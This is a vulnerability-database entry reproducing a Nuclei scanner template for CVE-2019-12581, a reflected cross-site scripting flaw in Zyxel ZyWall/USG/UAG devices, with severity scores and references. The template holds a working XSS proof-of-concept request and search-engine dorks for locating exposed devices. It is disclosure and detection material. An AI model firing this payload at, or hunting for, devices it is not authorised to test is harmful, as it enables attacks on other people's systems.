Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-12581
HistoryMay 28, 2022 - 10:54 p.m.

Zyxel ZyWal/USG/UAG Devices - Cross-Site Scripting

2022-05-2822:54:42
ProjectDiscovery
github.com
1

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.004 Low

EPSS

Percentile

71.9%

Zyxel ZyWall, USG, and UAG devices allow remote attackers to inject arbitrary web script or HTML via the err_msg parameter free_time_failed.cgi CGI program, aka reflective cross-site scripting.

id: CVE-2019-12581

info:
  name: Zyxel ZyWal/USG/UAG Devices - Cross-Site Scripting
  author: n-thumann
  severity: medium
  description: Zyxel ZyWall, USG, and UAG devices allow remote attackers to inject arbitrary web script or HTML via the err_msg parameter free_time_failed.cgi CGI program, aka reflective cross-site scripting.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest firmware update provided by Zyxel to fix the XSS vulnerability.
  reference:
    - https://www.zyxel.com/support/vulnerabilities-related-to-the-Free-Time-feature.shtml
    - https://sec-consult.com/vulnerability-lab/advisory/reflected-cross-site-scripting-in-zxel-zywall/
    - https://n-thumann.de/blog/zyxel-gateways-missing-access-control-in-account-generator-xss/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-12581
    - https://www.zyxel.com/us/en/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-12581
    cwe-id: CWE-79
    epss-score: 0.00358
    epss-percentile: 0.7209
    cpe: cpe:2.3:h:zyxel:uag2100:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: zyxel
    product: uag2100
    shodan-query: http.title:"ZyWall"
    fofa-query: title="zywall"
    google-query: intitle:"zywall"
  tags: cve,cve2019,zyxel,zywall,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/free_time_failed.cgi?err_msg=<script>alert(document.domain);</script>"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(document.domain);</script>"
          - "Please contact with administrator."
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a004630440220227bc39f0e29587123271b11fb51a1771f772556dbe2e16fcedca6ce1145e1d0022044eccbd11473b67273e8efa4a5380c54ead2423611e481c03e88e725e8a2beb8:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.004 Low

EPSS

Percentile

71.9%

Related for NUCLEI:CVE-2019-12581